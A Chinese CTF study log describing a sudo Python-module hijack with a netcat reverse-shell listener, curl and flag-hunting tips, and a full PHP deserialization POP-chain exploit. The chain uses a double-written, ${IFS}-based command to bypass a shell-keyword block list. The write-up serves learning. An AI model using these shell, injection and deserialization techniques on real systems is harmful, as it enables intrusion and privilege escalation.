<a name="QTz5G"></a>
## 本周内容
1.ISCTF完赛<br />2.开源情报
<a name="Qkacc"></a>
## 成果展示
<a name="o9pzY"></a>
### 1.sudopy
find / -writable -type f 2>/dev/null | grep -v "/proc/"查找可写文件<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1701190533740-49e9af00-bd5a-4908-a3e7-a3c401b31598.png#averageHue=%23141414&clientId=u49f049e0-c036-4&from=paste&height=140&id=u61547b5e&originHeight=140&originWidth=881&originalType=binary&ratio=1&rotation=0&showTitle=false&size=17096&status=done&style=none&taskId=u25e66e74-e7ec-4a5f-9cb0-4de5de4d570&title=&width=881)<br />写入webbrowser pyshell<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1701190465015-63213eeb-2e78-4ef8-9501-41760a8e082f.png#averageHue=%23101010&clientId=u49f049e0-c036-4&from=paste&height=768&id=ue41b651f&originHeight=768&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&size=102678&status=done&style=none&taskId=u00b99c00-c9c5-4083-90f9-164ab26d33d&title=&width=1280)<br />sudo python3 /home/ctf/web.py<br />起VPS连接服务器<br />nc -lvp 25565<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1701190706638-d6460caf-dd9b-434f-8f99-0af7eaeaa86f.png#averageHue=%230e0e0e&clientId=u49f049e0-c036-4&from=paste&height=768&id=uaf538590&originHeight=768&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&size=55548&status=done&style=none&taskId=u0539af40-655d-46e8-979e-17c72804297&title=&width=1280)
<a name="rs4qG"></a>
### 2.curl
curl -T可以上传，-O可以下载<br />flag还可能会藏在env中，flag.txt中<br />在flag.txt中，可以使用fla[a-z]ggggggg.txt读取flag<br />看到登录框，得试一下ssti,XSS都得试
<a name="dIpXf"></a>
### 3.HECTF-ezphp
随机数生成
```php
<?php
  mt_srand(1442660857);
for($i=0;$i<1000;$i++){
  echo mt_rand()."\n";
}
```
取出随机数可以进行爆破
```php
if(unserialize($this->auth)=="zxk1ing"){
    $star = implode(array($this->obj,"⭐","⭐","⭐","⭐","⭐"));
    echo $star;
}
```
这个代码检查反序列化后的auth是否为zxk1ing<br />就需要把auth专门赋值<br />如果分开来写是不行的，会提示缺少一个参数<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1701431603480-02b23a93-7c66-49be-a3b8-71680400f199.png#averageHue=%23242322&clientId=uae06cf3e-b1ef-4&from=paste&height=219&id=u2e1608cf&originHeight=219&originWidth=1775&originalType=binary&ratio=1&rotation=0&showTitle=false&size=48514&status=done&style=none&taskId=ub3b78b85-954a-499f-a5d9-400af3ae042&title=&width=1775)<br />需要合起来一块写
```php
$pop = new unser(new heeectf(),'s:7:"zxk1ing";');
echo serialize($pop);
```
然后是preg_replace的双写绕过
```php
<?php
highlight_file(__FILE__);
class GGbond{
    public $candy;
    public function __call($func,$arg){
        $func($arg);
    }
    public function __toString(){
        return $this->candy->str;
    }
}
class unser{
    public $obj;
    public $auth;
    public function __construct($obj,$name){
        $this->obj = $obj;
        $this->obj->auth = $name;
    }
    public function __destruct(){
        $this->obj->Welcome();
    }
}
class HECTF{
    public $cmd;
    public function __invoke(){
        echo "invoke";
        if($this->cmd){
            $this->cmd = preg_replace("/ls|cat|tac|more|sort|head|tail|nl|less|flag|cd|tee|bash|sh|&|^|>|<|\.| |'|`|\(|\"/i","",$this->cmd);
        }
        exec($this->cmd);
    }
}
class heeectf{
    public $obj;
    public $flag = "Welcome";
    public $auth = "who are you?";
    public function Welcome(){
        if(unserialize($this->auth)=="zxk1ing"){
            $star = implode(array($this->obj,"⭐","⭐","⭐","⭐","⭐"));
            echo $star;
        }
        else
            echo 'Welcome HECTF! Have fun!';
    }
    public function __get($get)
    {
        $func = $this->flag;
        return $func();
    }
}
new unser(new heeectf(),"user");
$data = $_POST['data'];
if(!preg_match('/flag/i',$data))
    unserialize($data);
else
    echo "想干嘛？？？"; 

$pop = new unser(new heeectf(),'s:7:"zxk1ing";');
$pop ->obj = new heeectf;
$pop ->obj ->auth = 's:7:"zxk1ing";';
$pop ->obj->obj = new GGbond();
$pop ->obj ->obj->candy = new heeectf;
$pop ->obj ->obj->flag = new HECTF;
$pop ->obj ->obj->flag->cmd = 'ccatat${IFS}/f*${IFS}|${IFS}tteeee${IFS}a';
echo serialize($pop);
```
最后是个16进制的绕过，改S就好了
